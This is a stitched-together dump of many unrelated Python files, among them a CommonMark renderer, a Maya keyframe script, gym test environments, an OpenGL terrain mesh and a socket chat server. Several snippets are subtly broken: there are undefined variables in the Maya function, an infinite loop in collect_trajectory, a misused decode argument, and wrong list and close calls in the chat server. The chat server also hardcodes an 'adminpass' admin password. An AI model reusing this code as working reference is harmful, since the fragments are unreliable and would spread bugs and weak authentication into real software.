# The parser sometimes includes an extra blank line.
# Might be a parser bug?
lines.pop(-1)
break
for line in lines:
self.emit_intent()
self.lit(line + "\n")
def thematic_break(self, node, entering):
self.emit_intent()
self.lit("-" * 60)
self.cr()
self.emit_end_block(node)
def block_quote(self, node, entering):
if entering:
self.block_indent.append("> ")
self.block_quote_start = len(self.buf)
else:
if self.block_quote_start == len(self.buf):
# If no content, still must emit something.
self.emit_intent()
self.cr()
self.block_indent.pop(-1)
def list(self, node, entering):
if entering:
# We could re-use the bullet character from the input:
# bullet_char = node.list_data['bullet_char']
# but for better normalization we'll choose a bullet char by
# alternating through *, -, and + as we go deeper into levels.
bullet_level = len(list(filter(lambda b : isinstance(b, ListBlock) and b.list_type == "bullet", self.block_indent)))
bullet_char = ["*", "-", "+"][bullet_level % 3]
# TODO #1: Two lists next to each other are distinguished as
# different if they have either a different bullet (for bulleted
# lists) or a different delimiter (the "." or ")" after the number,
# for ordered lists). That distinction might be lost here and
# would result in two lists being combined into one.
# TODO #2: A list can be loose or tight, but we don't output them
# any differently.
self.block_indent.append(ListBlock(node.list_data['type'], node.list_data['start'], bullet_char))
else:
self.block_indent.pop(-1)
self.emit_end_block(node)
def item(self, node, entering):
if entering:
# Find the ListBlock that was most recently added to self.block_indent.
parent_list = [b for b in self.block_indent if isinstance(b, ListBlock)][-1]
self.block_indent.append(ItemBullet(parent_list))
self.item_start = len(self.buf)
else:
if len(self.buf) == self.item_start:
# Always emit a bullet even if there was no content.
self.emit_intent()
self.cr()
self.block_indent.pop(-1)
def html_inline(self, node, entering):
raise RawHtmlNotAllowed()
def html_block(self, node, entering):
raise RawHtmlNotAllowed()
def custom_inline(self, node, entering):
# copied from the HTML renderer
if entering and node.on_enter:
self.lit(node.on_enter)
elif (not entering) and node.on_exit:
self.lit(node.on_exit)
def custom_block(self, node, entering):
# copied from the HTML renderer
self.cr()
if entering and node.on_enter:
self.lit(node.on_enter)
elif (not entering) and node.on_exit:
self.lit(node.on_exit)
self.emit_end_block(node)
class CommonMarkToCommonMarkRenderer(PlainTextRenderer):
def __init__(self):
super(CommonMarkToCommonMarkRenderer, self).__init__()
self.setext_heading_chars = ["=", "-"]
def out(self, s):
# Escape characters that have significance to the CommonMark spec.
# While all ASCII punctuation can be escaped (http://spec.commonmark.org/0.28/#ascii-punctuation-character),
# not all ASCII punctuation has significance. Some symbols are
# significant only in certain context (e.g. start of line) but
# we don't know the context here.
always_escape = {
"`", "~", # fenced code blocks, code spans
"<", # raw HTML start conditions
"*", "_", # emphasis and strong emphasis
"[", "]", # link text
"<", ">", # link destination, autolink
"\"", "'", # link title
# "(", ")", # inline link -- if it were valid, it would have balanced parens so escaping would not be necessary?
"!", # image
}
# Always escape the characters above.
pattern = "|".join(re.escape(c) for c in always_escape)
# Escape things that look like character references but aren't.
pattern += r"|&\w+;|&#[Xx]?[0-9A-Fa-f]+;"
# Some characters only need escaping at the start of a line, which might
# include start-of-line characters. But we don't have a way to detect
# that at the moment. We can just filter out of if it doesn't follow
# something that can't precede it on a line.
escape_at_line_start = {
"---", "___", "***", # thematic break
"#", # ATX headers
"=", "-", # setext underline
"[", # link reference definitions (but not the colon since a stray colon could not be confused here)
">", # block quotes
"-", "+", "*", # bullet list marker
}
pattern += "|" + "|".join("(?<![A-Za-z0-9])" + re.escape(c) for c in escape_at_line_start)
# The ordered list markers need escapes just when they follow a digit.
pattern += r"|(?<=[0-9])[\.\)]"
# Escape backslashes if followed by punctuation (other backslashes
# cannot be for escapes and are treated literally).
ascii_punctuation_chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
pattern += r"|\\(?=[" + re.escape(ascii_punctuation_chars) +"])"
# Apply substitutions.
s = re.sub(pattern, lambda m : "\\" + m.group(0), s, re.M)
super(CommonMarkToCommonMarkRenderer, self).out(s)
def linebreak(self, node=None, entering=None):
self.lit("\\\n")
self.emit_intent()
def link(self, node, entering):
# Determine if the link label and the destination are the same by rendering
# this node using the plain text renderer. Luckily, if they are the same,
# the plain text renderer simply emits the label without the destination.
link_label = PlainTextRenderer().render(node)
if (link_label == node.destination) or ("mailto:" + link_label.lower().lower() == node.destination.lower()) \
and re.match(r"[A-Za-z][A-Za-z0-9+\.-]{1,32}:[^<> ]*$", node.destination):
# Emit an autolink.
if entering:
destination = node.destination
if destination.lower().startswith("mailto:"):
destination = destination[7:]
self.lit("<")
self.lit(node.destination)
self.lit(">")
self.autolink_start = len(self.buf)
else:
# kill any content emitted within this node
self.buf = self.buf[0:self.autolink_start]
else:
if entering:
self.lit("[")
else:
self.lit("](")
# When wrapping the destination with parens, then internal parens must be
# either well-nested (which is hard to detect) or escaped.
self.lit(node.destination.replace("(", "\\(").replace(")", "\\)"))
if node.title:
self.lit(" \"")
# When wrapping the title in double quotes, internal double quotes
# must be escaped.
self.lit(node.title.replace("\"", "\\\""))
self.lit("\"")
self.lit(")")
def image(self, node, entering):
if entering:
self.lit("
# same as link, see above
self.lit(node.destination.replace("(", "\\(").replace(")", "\\)"))
if node.title:
# same as link, see above
self.lit(" \"")
self.lit(node.title.replace("\"", "\\\""))
self.lit("\"")
self.lit(")")
def heading(self, node, entering):
if node.level <= 2:
# Prefer setext-style heading for levels 1 and 2, because it is
# the only style that supports multi-line content within it, which
# we might have (and we don't know at this point).
super(CommonMarkToCommonMarkRenderer, self).heading(node, entering)
else:
# Use ATX-style headings for other levels.
if entering:
self.lit("#" * node.level + " ")
self.block_indent.append(" " * (node.level+1))
else:
self.cr()
self.block_indent.pop(-1)
def emit_code_block_fence(self, content, info_string=None):
# Choose a fence string that does not appear in the content
# of the code block. A fence string can made made up of
# backticks or tildes, but we'll stick to backticks.
fence_string = "```"
while fence_string in content:
fence_string += fence_string[0]
self.lit(fence_string)
if info_string:
self.out(info_string)
self.cr()
def html_inline(self, node, entering):
self.lit(node.literal)
def html_block(self, node, entering):
self.lit('\n')
self.emit_intented_literal(node.literal)
self.emit_end_block(node)
# Define a new helper method that would be an in-place replacement
# for commonmark.commonmark.
def commonmark_to_html(markup):
parser = commonmark.Parser()
ast = parser.parse(markup)
return PlainTextRenderer().render(ast)
if __name__ == "__main__":
# Run the parser on STDIN and write to STDOUT.
import sys
print(commonmark_to_html(sys.stdin.read()))
|
import maya.cmds as cmds
import maya.OpenMaya as om
from keychain.api.utils import matrix as matrix_utils
def get_xform_relation(driver, target):
# get parent
rotOrder = cmds.getAttr("{}.rotateOrder".format(target))
# get driver matrix
driverInverseMatrix = matrix_utils.get_matrix_from_xform(
driver,
start,
"worldInverseMatrix"
)
# get start matrix
anchorMatrix = matrix_utils.get_matrix_from_xform(
target,
start,
"worldMatrix"
)
# key frame attributes
for i in range(start, end):
# get driver and transform matrices
driverMatrix = matrix_utils.get_matrix_from_xform(
driver,
i,
"worldMatrix"
)
inverseMatrix = matrix_utils.get_matrix_from_xform(
target,
i,
"parentInverseMatrix"
)
# get driver matrix difference
differenceMatrix = driverInverseMatrix * driverMatrix
# get local matrix
localMatrix = differenceMatrix * anchorMatrix * inverseMatrix
# extract transform values from matrix
rotPivot = cmds.getAttr("{}.rotatePivot".format(target))[0]
transformValues = matrix_utils.decomposeMatrix(
localMatrix,
rotOrder,
rotPivot,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-----------------------------------------
@Author: zhaocy
@Email: 19110240027@fudan.edu.cn
@Created: 2020/6/22
------------------------------------------
@Modify: 2020/6/22
------------------------------------------
@Description:
"""
from chardet import detect
from definitions import DATA_DIR
if __name__ == '__main__':
fn = DATA_DIR + '/wiki_cn'
with open(fn, 'rb') as f:
s = f.read()
newf = DATA_DIR + '/wiki_cn_new.txt'
with open(newf, 'wb') as f:
f.write(s.decode('ignore').encode('utf8'))
print('done!convert coding to utf-8 and wirte content in `{}`'.format(newf))
|
from nodeconductor.oracle import views
def register_in(router):
router.register(r'oracle', views.OracleServiceViewSet, base_name='oracle')
router.register(r'oracle-zones', views.ZoneViewSet, base_name='oracle-zone')
router.register(r'oracle-templates', views.TemplateViewSet, base_name='oracle-template')
router.register(r'oracle-databases', views.DatabaseViewSet, base_name='oracle-database')
router.register(r'oracle-service-project-link', views.OracleServiceProjectLinkViewSet, base_name='oracle-spl')
|
import pytest
import time
from common.serializers.serialization import domain_state_serializer
from indy_common.authorize.auth_actions import AuthActionAdd, AuthActionEdit
from indy_common.authorize.auth_constraints import ConstraintsSerializer
from indy_common.authorize.auth_map import auth_map
from indy_common.authorize.auth_request_validator import WriteRequestValidator
from indy_common.test.constants import IDENTIFIERS
from indy_common.types import Request
from indy_node.persistence.idr_cache import IdrCache
from indy_node.server.node import Node
from plenum.common.constants import STEWARD, TRUSTEE
from indy_common.constants import ENDORSER, LOCAL_AUTH_POLICY, NETWORK_MONITOR, CONFIG_LEDGER_AUTH_POLICY
from plenum.common.exceptions import UnauthorizedClientRequest
from plenum.test.helper import randomOperation
from plenum.test.testing_utils import FakeSomething
from state.pruning_state import PruningState
from storage.kv_in_memory import KeyValueStorageInMemory
from indy_node.test.conftest import write_request_validation, write_auth_req_validator, idr_cache
@pytest.fixture(scope='function', params=[True, False])
def is_owner(request):
return request.param
@pytest.fixture(scope='function', params=[True, False])
def off_ledger_signature(request):
return request.param
@pytest.fixture(scope='function')
def action_add():
return AuthActionAdd(txn_type='SomeType',
field='some_field',
value='new_value')
@pytest.fixture(scope='function')
def action_edit():
return AuthActionEdit(txn_type='SomeType',
field='some_field',
old_value='old_value',
new_value='new_value')
@pytest.fixture(scope="module")
def constraint_serializer():
return ConstraintsSerializer(domain_state_serializer)
@pytest.fixture(scope="module")
def config_state(constraint_serializer):
state = PruningState(KeyValueStorageInMemory())
Node.add_auth_rules_to_config_state(state=state,
auth_map=auth_map,
serializer=constraint_serializer)
return state
@pytest.fixture(scope='module', params=[v[0] for v in IDENTIFIERS.values()])
def identifier(request):
return request.param
@pytest.fixture(scope='module')
def req(identifier):
return Request(identifier=identifier,
operation=randomOperation(),
signature='signature')
|
from argparse import ArgumentParser
import codecs
import os
"""
To encode:
python /home/david/Escritorio/encoding2multitask.py \
--input /home/david/Escritorio/dataset/ptb/ptb-dev.seq_lu \
--output /tmp/ptb-dev.multitask \
--status encode
To decode:
python /home/david/Escritorio/encoding2multitask.py \
--input /tmp/ptb-test.multitask \
--output /tmp/ptb-test.reversed \
--status decode
"""
def tag_to_multitask(tag):
tag_split = tag.split("_")
#It is a tag that encodes (level, label, leaf unary branch)
if len(tag_split) == 3:
return "{}".join(tag_split)
#It is a regular tag
elif len(tag_split) == 2:
return "{}".join((tag_split[0], tag_split[1], "-EMPTY-"))
elif tag in ["-BOS-","-EOS-", "NONE"]:
return "{}".join([tag,tag,tag])
else:
raise NotImplementedError("len(tag_split)==1")
"""
Transforms an encoding of a tree in a relative scale into an
encoding of the tree in an absolute scale.
"""
def to_absolute_levels(relative_levels):
absolute_sequence = [0]*len(relative_levels)
current_level = 0
for j,level in enumerate(relative_levels):
if level in ["-BOS-","-EOS-", "NONE"]:
absolute_sequence[j] = level
elif level == "ROOT":
absolute_sequence[j] = "1"
current_level+=1
else:
current_level+= int(level)
absolute_sequence[j] = str(current_level)
return absolute_sequence
#TODO: What to do if not for all tasks we return a -BOS-/-EOS- when needed. Voting approach?
def multitag_to_tag(multitag):
multitag_split = multitag.split("{}")[0:3]
if multitag_split[1] in ["-BOS-","-EOS-","NONE"]:
return multitag_split[1]
if multitag_split[2] != "-EMPTY-":
return "_".join(multitag_split)
else:
return "_".join(multitag_split[0:2])
def decode_int(preds):
#f_output = codecs.open(args.output,"w")
decoded_output = ''
sentence = []
#with codecs.open(args.input) as f_input:
#lines = f_input.readlines()
# print(preds)
for l in preds.split('^^'):
if l != "\n":
# print(l)
word,postag,label = l.strip().split("\t")
label = multitag_to_tag(label) #The tasks that we care about are just the first three ones.
sentence.append([word,postag,label])
#f_output.write("\t".join([word,postag,label])+"\n")
else:
# print("END")
for token in sentence:
decoded_output += "\t".join(token)+"\n"
#f_output.write("\t".join(token)+"\n")
sentence = []
#f_output.write("\n")
decoded_output +="\n"
# print("dec: ",decoded_output)
return decoded_output
if __name__ == '__main__':
arg_parser = ArgumentParser()
arg_parser.add_argument("--input", dest="input",
help="Path to the original encoding used in Constituent Parsing as Sequence Labeling",
default=None)
arg_parser.add_argument("--output", dest="output",
help="Path to the output encoding, formatted as multitask learning", default=None)
arg_parser.add_argument("--status", dest="status",
help="[encode|decode]")
arg_parser.add_argument("--split_char", dest="split_char",type=str,
default="@")
arg_parser.add_argument("--multitask_char", dest="multitask_char",type=str,
default="{}")
args = arg_parser.parse_args()
auxiliary_tasks = ["absolute_scale"]
sentence = []
if args.status == "encode":
f_output = codecs.open(args.output,"w")
with codecs.open(args.input) as f_input:
lines = f_input.readlines()
relative_levels = []
for l in lines:
if l != "\n":
word,postag,label = l.strip().split("\t")
label = tag_to_multitask(label)
if "absolute_scale" in auxiliary_tasks:
relative_levels.append(label.split(args.multitask_char)[0])
sentence.append([word,postag,label])
#f_output.write("\t".join([word,postag,label])+"\n")
else:
if "absolute_scale" in auxiliary_tasks:
absolute_levels = to_absolute_levels(relative_levels)
for idtoken, token in enumerate(sentence):
token[2] += "{}"+absolute_levels[idtoken]
f_output.write("\t".join(token)+"\n")
f_output.write("\n")
sentence = []
relative_levels = []
absolute_levels = []
elif args.status == "decode":
f_output = codecs.open(args.output,"w")
with codecs.open(args.input) as f_input:
lines = f_input.readlines()
for l in lines:
if l != "\n":
word,postag,label = l.strip().split("\t")
label = multitag_to_tag(label) #The tasks that we care about are just the first three ones.
sentence.append([word,postag,label])
#f_output.write("\t".join([word,postag,label])+"\n")
else:
for token in sentence:
f_output.write("\t".join(token)+"\n")
sentence = []
f_output.write("\n")
|
"""
This module defines the default metadata and data dictionaries for each explanation method.
Note that the "name" field is automatically populated upon initialization of the corresponding
Explainer class.
"""
# Anchors
DEFAULT_META_ANCHOR = {"name": None,
"type": ["blackbox"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default anchor metadata.
"""
DEFAULT_DATA_ANCHOR = {"anchor": [],
"precision": None,
"coverage": None,
"raw": None} # type: dict
"""
Default anchor data.
"""
DEFAULT_DATA_ANCHOR_IMG = {"anchor": [],
"segments": None,
"precision": None,
"coverage": None,
"raw": None} # type: dict
"""
Default anchor image data.
"""
# CEM
DEFAULT_META_CEM = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default CEM metadata.
"""
DEFAULT_DATA_CEM = {"PN": None,
"PP": None,
"PN_pred": None,
"PP_pred": None,
"grads_graph": None,
"grads_num": None,
"X": None,
"X_pred": None
} # type: dict
"""
Default CEM data.
"""
# Counterfactuals
DEFAULT_META_CF = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default counterfactual metadata.
"""
DEFAULT_DATA_CF = {"cf": None,
"all": [],
"orig_class": None,
"orig_proba": None,
"success": None} # type: dict
"""
Default counterfactual data.
"""
# CFProto
DEFAULT_META_CFP = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default counterfactual prototype metadata.
"""
DEFAULT_DATA_CFP = {"cf": None,
"all": [],
"orig_class": None,
"orig_proba": None,
"id_proto": None
} # type: dict
"""
Default counterfactual prototype metadata.
"""
# KernelSHAP
KERNEL_SHAP_PARAMS = [
'link',
'group_names',
'grouped',
'groups',
'weights',
'summarise_background',
'summarise_result',
'transpose',
'kwargs',
]
"""
KernelShap parameters updated and return in metadata['params'].
"""
DEFAULT_META_KERNEL_SHAP = {
"name": None,
"type": ["blackbox"],
"task": None,
"explanations": ["local", "global"],
"params": dict.fromkeys(KERNEL_SHAP_PARAMS),
"version": None
} # type: dict
"""
Default KernelShap metadata.
"""
DEFAULT_DATA_KERNEL_SHAP = {
"shap_values": [],
"expected_value": [],
"categorical_names": {},
"feature_names": [],
"raw": {
"raw_prediction": None,
"prediction": None,
"instances": None,
"importances": {},
}
} # type: dict
"""
Default KernelShap data.
"""
# ALE
DEFAULT_META_ALE = {
"name": None,
"type": ["blackbox"],
"explanations": ["global"],
"params": {},
"version": None
} # type: dict
"""
Default ALE metadata.
"""
DEFAULT_DATA_ALE = {
"ale_values": [],
"constant_value": None,
"ale0": [],
"feature_values": [],
"feature_names": None,
"target_names": None,
"feature_deciles": None
} # type: dict
"""
Default ALE data.
"""
# TreeShap
TREE_SHAP_PARAMS = [
'model_output',
'summarise_background',
'summarise_result',
'approximate',
'interactions',
'explain_loss',
'algorithm',
'kwargs'
]
"""
TreeShap parameters updated and return in metadata['params'].
"""
DEFAULT_META_TREE_SHAP = {
"name": None,
"type": ["whitebox"],
"task": None, # updates with 'classification' or 'regression'
"explanations": ["local", "global"],
"params": dict.fromkeys(TREE_SHAP_PARAMS),
"version": None
} # type: dict
"""
Default TreeShap metadata.
"""
DEFAULT_DATA_TREE_SHAP = {
"shap_values": [],
"shap_interaction_values": [],
"expected_value": [],
"categorical_names": {},
"feature_names": [],
"raw": {
"raw_prediction": None,
"loss": None,
"prediction": None,
"instances": None,
"labels": None,
"importances": {},
}
} # type: dict
"""
Default TreeShap data.
"""
# Integrated gradients
DEFAULT_META_INTGRAD = {
"name": None,
"type": ["whitebox"],
"explanations": ["local"],
"params": {},
"version": None
} # type: dict
"""
Default IntegratedGradients metadata.
"""
DEFAULT_DATA_INTGRAD = {
"attributions": None,
"X": None,
"forward_kwargs": None,
"baselines": None,
"predictions": None,
"deltas": None
} # type: dict
"""
Default IntegratedGradients data.
"""
DEFAULT_META_CFRL = {"name": None,
"type": ["blackbox"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default CounterfactualRL metadata.
"""
DEFAULT_DATA_CFRL = {"orig": None,
"cf": None,
"target": None,
"condition": None} # type: dict
"""
Default CounterfactualRL data.
"""
|
import random
from abc import ABC
from typing import Optional
import gym
from rld.rollout import Trajectory, Timestep, Rollout
from rld.tests.resources.spaces import (
BOX_OBS_SPACE,
IMAGE_OBS_SPACE,
DICT_OBS_SPACE,
DISCRETE_ACTION_SPACE,
MULTI_DISCRETE_ACTION_SPACE,
TUPLE_ACTION_SPACE,
)
class BaseEnv(gym.Env, ABC):
def __init__(self, env_config: Optional[dict] = None):
super().__init__()
self.env_config = env_config
def reset(self):
return self.observation_space.sample()
def step(self, action):
reward = random.random()
done = reward > 0.5
return self.observation_space.sample(), reward, done, {}
def render(self, mode="human"):
pass
class BoxObsDiscreteActionEnv(BaseEnv):
observation_space = BOX_OBS_SPACE
action_space = DISCRETE_ACTION_SPACE
class BoxObsMultiDiscreteActionEnv(BaseEnv):
observation_space = BOX_OBS_SPACE
action_space = MULTI_DISCRETE_ACTION_SPACE
class BoxObsTupleActionEnv(BaseEnv):
observation_space = BOX_OBS_SPACE
action_space = TUPLE_ACTION_SPACE
class ImageObsDiscreteActionEnv(BaseEnv):
observation_space = IMAGE_OBS_SPACE
action_space = DISCRETE_ACTION_SPACE
class ImageObsMultiDiscreteActionEnv(BaseEnv):
observation_space = IMAGE_OBS_SPACE
action_space = MULTI_DISCRETE_ACTION_SPACE
class ImageObsTupleActionEnv(BaseEnv):
observation_space = IMAGE_OBS_SPACE
action_space = TUPLE_ACTION_SPACE
class DictObsDiscreteActionEnv(BaseEnv):
observation_space = DICT_OBS_SPACE
action_space = DISCRETE_ACTION_SPACE
class DictObsMultiDiscreteActionEnv(BaseEnv):
observation_space = DICT_OBS_SPACE
action_space = MULTI_DISCRETE_ACTION_SPACE
class DictObsTupleActionEnv(BaseEnv):
observation_space = DICT_OBS_SPACE
action_space = TUPLE_ACTION_SPACE
ALL_ENVS = [
BoxObsDiscreteActionEnv,
BoxObsMultiDiscreteActionEnv,
# BoxObsTupleActionEnv,
ImageObsDiscreteActionEnv,
ImageObsMultiDiscreteActionEnv,
# ImageObsTupleActionEnv,
DictObsDiscreteActionEnv,
DictObsMultiDiscreteActionEnv,
# DictObsTupleActionEnv,
]
def collect_trajectory(env: gym.Env, max_steps: int = 100) -> Trajectory:
obs = env.reset()
timesteps = []
i = 0
while i < max_steps:
action = env.action_space.sample()
new_obs, reward, done, info = env.step(action)
timesteps.append(Timestep(obs, action, reward, done, info))
obs = new_obs
if done:
break
return Trajectory(timesteps)
def collect_rollout(
env: gym.Env, episodes: int = 10, max_steps_per_episode: int = 100
) -> Rollout:
trajectories = []
for episode in range(episodes):
trajectories.append(collect_trajectory(env, max_steps_per_episode))
return Rollout(trajectories)
|
import numpy as np
import matplotlib.pyplot as plt
def mystep(x,y, ax=None, where='post', **kwargs):
# https://stackoverflow.com/questions/44961184/matplotlib-plot-only-horizontal-lines-in-step-plot
assert where in ['post', 'pre']
x = np.array(x)
y = np.array(y)
if where=='post': y_slice = y[:-1]
if where=='pre': y_slice = y[1:]
X = np.c_[x[:-1],x[1:],x[1:]]
Y = np.c_[y_slice, y_slice, np.zeros_like(x[:-1])*np.nan]
if not ax: ax=plt.gca()
return ax.plot(X.flatten(), Y.flatten(), **kwargs) |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
config = {
'name': 'google-common',
'version': '0.0.1',
'description': 'Google namespace package',
'author': 'haosdent',
'author_email': 'haosdent@gmail.com',
'url': 'http://pypi.python.org/pypi/google-common',
'packages': [ 'google' ],
'package_dir': { '': 'src' },
'license': 'Apache 2.0',
'keywords': ['google', 'namespace'],
'classifiers': [ ]
}
from setuptools import setup
setup(**config)
|
from golem import actions
from golem.core.exceptions import ElementNotFound
description = 'Verify the webdriver.find method throws error when element is not found'
def test(data):
actions.navigate(data.env.url+'elements/')
browser = actions.get_browser()
selector = '.invalid-selector-value'
actions.step('Find element by css')
try:
elem = browser.find(css=selector)
except ElementNotFound:
pass
|
from itertools import cycle
import glfw
import numpy as np
import OpenGL.GL as GL
from PIL import Image
from mesh import Mesh
from texture import Texture
from transform import normalized
from node import Node
import config
# -------------- Example texture plane class ----------------------------------
class TexturedPlane(Mesh, Node):
""" Simple first textured object """
def __init__(self, background_texture_file, road_texture_file, road2_texture_file, blendmap_file, shader, size, hmap_file):
# Load heightmap file
hmap_tex = np.asarray(Image.open(hmap_file).convert('RGB'))
self.MAX_HEIGHT = 30
self.MIN_HEIGHT = 0
self.MAX_PIXEL_COLOR = 256
self.HMAP_SIZE = hmap_tex.shape[0] # 256
self.background_texture_file = background_texture_file
self.road_texture_file = road_texture_file
self.road2_texture_file = road2_texture_file
self.blendmap_file = blendmap_file
# self.fog_colour = FogColour()
vertices, texture_coords, normals, indices = self.create_attributes(self.HMAP_SIZE, hmap_tex=hmap_tex)
super().__init__(shader, [vertices, texture_coords, normals], indices)
self.names = ['diffuse_map', 'blue_texture', 'red_texture', 'blendmap', 'fog_colour']
self.loc1 = {n: GL.glGetUniformLocation(shader.glid, n) for n in self.names}
# interactive toggles
self.wrap = cycle([GL.GL_REPEAT, GL.GL_MIRRORED_REPEAT,
GL.GL_CLAMP_TO_BORDER, GL.GL_CLAMP_TO_EDGE])
self.filter = cycle([(GL.GL_NEAREST, GL.GL_NEAREST),
(GL.GL_LINEAR, GL.GL_LINEAR),
(GL.GL_LINEAR, GL.GL_LINEAR_MIPMAP_LINEAR)])
self.wrap_mode, self.filter_mode = next(self.wrap), next(self.filter)
# setup texture and upload it to GPU
self.background_texture = Texture(self.background_texture_file, self.wrap_mode, *self.filter_mode)
self.road_texture = Texture(self.road_texture_file, self.wrap_mode, *self.filter_mode)
self.road2_texture = Texture(self.road2_texture_file, self.wrap_mode, *self.filter_mode)
self.blendmap_texture = Texture(self.blendmap_file, self.wrap_mode, *self.filter_mode)
def create_attributes(self, size, hmap_tex):
vertices = []
normals = []
texture_coords = []
# Create vertices, normals, and texture coordinates
for i in range(0, size):
for j in range(0, size):
# Vertices - (x, y, z)
vertices.append([(j / (size - 1)) * 1000,
self.get_height(i, j, image=hmap_tex),
(i / (size - 1)) * 1000])
normals.append(self.calculate_normal(x=j, z=i, hmap_image=hmap_tex))
# normals.append([0, 1, 0])
texture_coords.append([j / (size - 1), i / (size - 1)])
# Convert to numpy array list
vertices = np.array(vertices)
normals = np.array(normals)
texture_coords = np.array(texture_coords)
indices = []
for gz in range(0, size - 1):
for gx in range(0, size - 1):
top_left = (gz * size) + gx
top_right = top_left + 1
bottom_left = ((gz + 1) * size) + gx
bottom_right = bottom_left + 1
indices.append([top_left, bottom_left, top_right, top_right, bottom_left, bottom_right])
indices = np.array(indices)
return vertices, texture_coords, normals, indices
def calculate_normal(self, x, z, hmap_image):
"""
Calculate normals based on current point's neightbours.
:param x: x coordinate
:param z: z coordinate
:param hmap_image: the heightmap image
:return: normalized calculated normals
"""
height_l = self.get_height(x-1, z, image=hmap_image)
height_r = self.get_height(x+1, z, hmap_image)
height_d = self.get_height(x, z-1, hmap_image)
height_u = self.get_height(x, z+1, hmap_image)
return normalized(np.array([height_l-height_r, 2.0, height_d-height_u]))
def get_height(self, x, z, image):
if x < 0 or x >= image.shape[0] or z < 0 or z >= image.shape[0]:
return 0
height = image[x, z, 0]
# [0 to 1] range
height /= self.MAX_PIXEL_COLOR
# [0 to MAX_HEIGHT] range
height *= self.MAX_HEIGHT
return height
def key_handler(self, key):
# some day-night interactive elements
if key == glfw.KEY_F6:
config.fog_colour.toggle_value = 6
if key == glfw.KEY_F7:
config.fog_colour.toggle_value = 7
if key == glfw.KEY_F8:
config.fog_colour.toggle_value = 8
def draw(self, projection, view, model, primitives=GL.GL_TRIANGLES):
GL.glUseProgram(self.shader.glid)
# texture access setups
self.bind_textures()
self.connect_texture_units()
super().draw(projection, view, model, primitives)
def connect_texture_units(self):
GL.glUniform1i(self.loc1['diffuse_map'], 0)
GL.glUniform1i(self.loc1['blue_texture'], 1)
GL.glUniform1i(self.loc1['red_texture'], 2)
GL.glUniform1i(self.loc1['blendmap'], 3)
GL.glUniform3fv(self.loc1['fog_colour'], 1, config.fog_colour.get_colour())
# print(self.fog_colour.get_atten()[0])
# atten_var = self.fog_colour.get_atten()
for i in range(0, config.fog_colour.num_light_src):
light_pos_loc = GL.glGetUniformLocation(self.shader.glid, 'light_position[%d]' % i)
GL.glUniform3fv(light_pos_loc, 1, config.fog_colour.light_pos[i])
atten_loc = GL.glGetUniformLocation(self.shader.glid, 'atten_factor[%d]' % i)
GL.glUniform3fv(atten_loc, 1, config.fog_colour.get_atten()[i])
def bind_textures(self):
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.background_texture.glid)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.road_texture.glid)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.road2_texture.glid)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.blendmap_texture.glid)
|
from pathlib import Path
from fastapi import FastAPI
from fastapi import staticfiles
from fastapi.staticfiles import StaticFiles
from fastapi_static_digest import StaticDigest, StaticDigestCompiler
app_root = Path(__file__).parent
static_input_dir = app_root / "static"
def create_app(output_dir=None):
app = FastAPI()
if output_dir is not None:
static_digest = StaticDigest(static_dir=output_dir)
static = StaticFiles(directory=static_digest.directory)
else:
static_digest = StaticDigest(source_dir=static_input_dir)
static = StaticFiles(directory=static_digest.directory)
app.mount("/static", static, name="static")
return app |
import threading
import socket
# Now this Host is the IP address of the Server, over which it is running.
# I've user my localhost.
host = "127.0.0.1"
port = 5555 # Choose any random port which is not so common (like 80)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Bind the server to IP Address
server.bind((host, port))
#Start Listening Mode
server.listen()
#List to contain the Clients getting connected and nicknames
clients = []
nicknames = []
# 1.Broadcasting Method
def broadcast(message):
for client in clients:
client.send(message)
# 2.Recieving Messages from client then broadcasting
def handle(client):
while True:
try:
msg = message = client.recv(1024)
if msg.decode('ascii').startswith('KICK'):
if nicknames[clients.index(client)] == 'admin':
name_to_kick = msg.decode('ascii')[5:]
kick_user(name_to_kick)
else:
client.send('Command Refused!'.encode('ascii'))
elif msg.decode('ascii').startswith('BAN'):
if nicknames[clients.index(client)] == 'admin':
name_to_ban = msg.decode('ascii')[4:]
kick_user(name_to_ban)
with open('bans.txt','a') as f:
f.write(f'{name_to_ban}\n')
print(f'{name_to_ban} was banned by the Admin!')
else:
client.send('Command Refused!'.encode('ascii'))
else:
broadcast(message) # As soon as message recieved, broadcast it.
except:
if client in clients:
index = clients.index(client)
#Index is used to remove client from list after getting diconnected
client.remove(client)
client.close
nickname = nicknames[index]
broadcast(f'{nickname} left the Chat!'.encode('ascii'))
nicknames.remove(nickname)
break
# Main Recieve method
def recieve():
while True:
client, address = server.accept()
print(f"Connected with {str(address)}")
# Ask the clients for Nicknames
client.send('NICK'.encode('ascii'))
nickname = client.recv(1024).decode('ascii')
# If the Client is an Admin promopt for the password.
with open('bans.txt', 'r') as f:
bans = f.readlines()
if nickname+'\n' in bans:
client.send('BAN'.encode('ascii'))
client.close()
continue
if nickname == 'admin':
client.send('PASS'.encode('ascii'))
password = client.recv(1024).decode('ascii')
# I know it is lame, but my focus is mainly for Chat system and not a Login System
if password != 'adminpass':
